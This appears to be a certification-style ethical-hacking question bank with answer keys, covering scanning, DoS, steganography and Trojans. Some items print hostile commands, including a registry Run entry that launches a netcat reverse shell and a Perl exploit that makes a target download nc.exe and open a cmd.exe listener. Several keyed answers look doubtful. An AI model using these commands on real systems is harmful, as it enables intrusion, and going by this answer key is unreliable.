51-100

63 Which of the following tools is used to download the Web pages of a Website on the local system? A. wget B. jplag C. Nessus D. Ettercap

A

54 Which of the following is the best method of accurately identifying the services running on a victim host? A. Use of the manual method of telnet to each of the open ports. B. Use of a port scanner to scan each port to confirm the services running. C. Use of hit and trial method to guess the services and ports of the victim host. D. Use of a vulnerability scanner to try to probe each port to verify which service is running.

A

61 Which of the following tools can be used to detect the steganography? A. Dskprobe B. Blindside C. ImageHide D. Snow

A

62 In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed? A. TCP FIN B. FTP bounce C. XMAS D. TCP SYN

A

67 Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str). What attack will his program expose the Web application to? A. Format string attack B. Cross Site Scripting attack C. SQL injection attack D. Sequence++ attack

A

70 Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise? A. Preparation phase B. Eradication phase C. Identification phase D. Recovery phase E. Containment phase

A

73 You work as a System Engineer for Cyber World Inc. Your company has a single Active Directory domain. All servers in the domain run Windows Server 2008. The Microsoft Hyper-V server role has been installed on one of the servers, namely uC1. uC1 hosts twelve virtual machines. You have been given the task to configure the Shutdown option for uC1, so that each virtual machine shuts down before the main Hyper-V server shuts down. Which of the following actions will you perform to accomplish the task? A. Enable the Shut Down the Guest Operating System option in the Automatic Stop Action Properties on each virtual machine. B. Manually shut down each of the guest operating systems before the server shuts down. C. Create a batch file to shut down the guest operating system before the server shuts down. D. Create a logon script to shut down the guest operating system before the server shuts down.

A

75 Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords? A. Rainbow attack B. Brute Force attack C. Dictionary attack D. Hybrid attack

A

81 Who are the primary victims of smurf attacks on the contemporary Internet system? A. IRC servers are the primary victims to smurf attacks B. FTP servers are the primary victims to smurf attacks C. SMTP servers are the primary victims to smurf attacks D. Mail servers are the primary victims to smurf attacks

A

99 Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it with chess.exe. Which of the following tools are required in such a scenario? Each correct answer represents a part of the solution. (Choose three.) A. NetBus B. Absinthe C. Yet Another Binder D. Chess.exe

ACD

56 Which of the following functions can be used as a countermeasure to a Shell Injection attack? Each correct answer represents a complete solution. (Choose all that apply.) A. escapeshellarg() B. mysql_real_escape_string() C. regenerateid() D. escapeshellcmd()

AD

82 Which of the following tools can be used for stress testing of a Web server? Each correct answer represents a complete solution. (Choose two.) A. Internet bots B. Scripts C. Anti-virus software D. Spyware

AB

51 Which of the following statements are true about firewalking? Each correct answer represents a complete solution. (Choose all that apply.) A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall. B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall. C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall. D. Firewalking works on the UDP packets.

ABC

87 Which of the following tools can be used to perform brute force attack on a remote database? Each correct answer represents a complete solution. (Choose all that apply.) A. SQLBF B. SQLDict C. FindSA D. nmap

ABC

59 Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1? Each correct answer represents a part of the solution. (Choose two.) A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3 errors. B. Move the WebStore1 server to the internal network. C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks. D. Move the computer account of WebStore1 to the Remote organizational unit (OU).

AC

90 Which of the following tools can be used for steganography? Each correct answer represents a complete solution. (Choose all that apply.) A. Image hide B. Stegbreak C. Snow.exe D. Anti-x

AC

96 Which of the following statements are true about session hijacking? Each correct answer represents a complete solution. (Choose all that apply.) A. Use of a long random number or string as the session key reduces session hijacking. B. It is used to slow the working of victim's network resources. C. TCP session hijacking is when a hacker takes over a TCP session between two machines. D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

ACD

65 Which of the following functions can you use to mitigate a command injection attack? Each correct answer represents a part of the solution. (Choose all that apply.) A. escapeshellarg() B. escapeshellcmd() C. htmlentities() D. strip_tags()

AB

66 Which of the following takes control of a session between a server and a client using TELNET, FTP, or any other non-encrypted TCP/IP utility? A. Dictionary attack B. Session Hijacking C. Trojan horse D. Social Engineering

B

69 Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we-are-secure.com. She wants to test a DoS attack on the We-are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server. Which of the following DoS attacks is Maria using to accomplish her task? A. Ping flood attack B. Fraggle DoS attack C. Teardrop attack D. Smurf DoS attack

B

76 Which of the following attacks is specially used for cracking a password? A. PING attack B. Dictionary attack C. Vulnerability attack D. DoS attack

B

77 You run the following bash script in Linux: for i in 'cat hostlist.txt' ;do nc -q 2 -v $i 80 < request.txt done Where hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script? A. You want to put nmap in the listen mode to the hosts given in the IP address list. B. You want to perform banner grabbing to the hosts given in the IP address list. C. You want to perform port scanning to the hosts given in the IP address list. D. You want to transfer file hostlist.txt to the hosts given in the IP address list.

B

85 Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases? A. Fragroute B. Absinthe C. Stick D. ADMutate

B

89 Which of the following commands can be used for port scanning? A. nc -t B. nc -z C. nc -w D. nc -g

B

84 Which of the following statements about a Trojan horse are true? Each correct answer represents a complete solution. (Choose two.) A. It is a macro or script that attaches itself to a file or template. B. The writers of a Trojan horse can use it later to gain unauthorized access to a computer. C. It is a malicious software program code that resembles another normal program. D. It infects the boot record on hard disks and floppy disks.

BC

52 You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. (Choose all that apply.) A. You want to perform banner grabbing. B. You want to set the Netcat to execute command any time. C. You want to put Netcat in the stealth mode. D. You want to add the Netcat command to the Windows registry.

BCD

64 Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services. Which of the following are the techniques used for network mapping by large organizations? Each correct answer represents a complete solution. (Choose three.) A. Packet crafting B. Route analytics C. SNMP-based approaches D. Active Probing

BCD

78 The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm? A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run C. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file" D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

C

53 You have inserted a Trojan on your friend's computer and you want to put it in the startup so that whenever the computer reboots the Trojan will start to run on the startup. Which of the following registry entries will you edit to accomplish the task? A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Startup B. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto C. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Start

C

60 Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack? A. Dash (-) B. Double quote (") C. Single quote (') D. Semi colon (;)

C

71 Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic? A. Klez B. Code red C. SQL Slammer D. Beast

C

79 John, a part-time hacker, has accessed in unauthorized way to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to malicious person Mark and make a deal to get a good amount of money. Since, he does not want to send the hacked information in the clear text format to Mark; he decides to send information in hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is John using for steganography? A. Image Hide B. 2Mosaic C. Snow.exe D. Netcat

C

80 Which of the following DoS attacks affects mostly Windows computers by sending corrupt UDP packets? A. Fraggle B. Ping flood C. Bonk D. Smurf

C

93 Adam works as an Incident Handler for Umbrella Inc. His recent actions towards the incident are not up to the standard norms of the company. He always forgets some steps and procedures while handling responses as they are very hectic to perform. Which of the following steps should Adam take to overcome this problem with the least administrative effort? A. Create incident manual read it every time incident occurs. B. Appoint someone else to check the procedures. C. Create incident checklists. D. Create new sub-team to keep check.

C

94 In which of the following attacking methods does an attacker distribute incorrect IP address? A. IP spoofing B. Mac flooding C. DNS poisoning D. Man-in-the-middle

C

95 You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close. Sometimes, IPID is being incremented by more than one value. What may be the reason? A. The firewall is blocking the scanning process. B. The zombie computer is not connected to the we-are-secure.com Web server. C. The zombie computer is the system interacting with some other system besides your computer. D. Hping does not perform idle scanning.

C

91 Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism? Each correct answer represents a complete solution. (Choose two.) A. Land attack B. SYN flood attack C. Teardrop attack D. Ping of Death attack

CD

74 You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task? A. Tripwire B. SubSeven C. Netstat D. Fport

D

83 An attacker sends a large number of packets to a target computer that causes denial of service. Which of the following type of attacks is this? A. Spoofing B. Snooping C. Phishing D. Flooding

D

86 You run the following command while using Nikto Web scanner: perl nikto.pl -h 192.168.0.1 -p 443 What action do you want to perform? A. Using it as a proxy server B. Updating Nikto C. Seting Nikto for network sniffing D. Port scanning

D

100 Victor works as a professional Ethical Hacker for ABC Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task: 1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs. 2. Reducing noise by adjusting color and averaging pixel value. 3. Sharpening, Rotating, Resampling, and Softening the image. Which of the following Steganography attacks is Victor using? A. Stegdetect Attack B. Chosen-Stego Attack C. Steg-Only Attack D. Active Attacks

D

55 Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows-based network. Jason successfully enters the target system remotely by using the advantage of vulnerability. He places a Trojan to maintain future access and then disconnects the remote session. The employees of the company complain to Mark, who works as a Professional Ethical Hacker for DataSoft Inc., that some computers are very slow. Mark diagnoses the network and finds that some irrelevant log files and signs of Trojans are present on the computers. He suspects that a malicious hacker has accessed the network. Mark takes the help from Forensic Investigators and catches Jason. Which of the following mistakes made by Jason helped the Forensic Investigators catch him? A. Jason did not perform a vulnerability assessment. B. Jason did not perform OS fingerprinting. C. Jason did not perform foot printing. D. Jason did not perform covering tracks. E. Jason did not perform port scanning.

D

57 Which of the following Nmap commands is used to perform a UDP port scan? A. nmap -sY B. nmap -sS C. nmap -sN D. nmap -sU

D

58 You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws? A. Manual penetration testing B. Code review C. Automated penetration testing D. Vulnerability scanning

D

68 Adam works as a sales manager for Umbrella Inc. He wants to download software from the Internet. As the software comes from a site in his untrusted zone, Adam wants to ensure that the downloaded software has not been Trojaned. Which of the following options would indicate the best course of action for Adam? A. Compare the file size of the software with the one given on the Website. B. Compare the version of the software with the one published on the distribution media. C. Compare the file's virus signature with the one published on the distribution. D. Compare the file's MD5 signature with the one published on the distribution media.

D

72 Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data created by DNS cache poisoning? A. Stub resolver B. BINDER C. Split-horizon DNS D. Domain Name System Extension (DNSSEC)

D

92 Adam, a malicious hacker performs an exploit, which is given below: ##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ##################################################### $host = $ARGV[0]; print "Starting ...\n"; print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host `"C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ... \n"; system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ... (Have a ftp server)\n"; $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0); Which of the following is the expected result of the above exploit? A. Creates a share called "sasfile" on the target system B. Creates an FTP server with write permissions enabled C. Opens up a SMTP server that requires no username or password D. Opens up a telnet listener that requires no username or password

D

97 Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this? A. Syn flood B. Ping storm C. Smurf attack D. DDOS

D

98 Adam works as a Security administrator for Umbrella Inc. He runs the following traceroute and notices that hops 19 and 20 both show the same IP address. 1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms 2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms 3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv. cox.net (68.100.0.1) 16.743 ms 16.207 ms 4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms 5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms 6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms 7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms "PassGuide" - 8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms 9 so-7-0-0.gar1. NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms 10 so-4-0-0.edge1.NewYork1.Level3. net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms 11 uunet-level3- oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms 12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.111 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms 14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms 33.910 ms 15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms 49.466 ms 16 0.so-3-0-0.XR1.MIA4.ALTER. NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms 17 117.ATM6- 0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms 18 PassGuidegw1. customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms 19 www.PassGuide.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms 20 www.PassGuide.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms Which of the following is the most like cause of this issue? A. An application firewall B. Intrusion Detection System C. Network Intrusion system D. A stateful inspection firewall

D

88 FILL BLANK - Fill in the blank with the appropriate term. _______is the practice of monitoring and potentially restricting the flow of information outbound from one network to another.

Egress filtering